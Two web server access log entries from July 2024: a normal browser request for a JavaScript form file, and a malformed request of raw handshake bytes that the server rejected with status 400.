178.165.188.60 - - [23/Jul/2024:13:01:17 +0200] "GET /gui/javascript/form_form.js?1721732477 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=732417" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
5.8.11.202 - - [23/Jul/2024:13:01:58 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
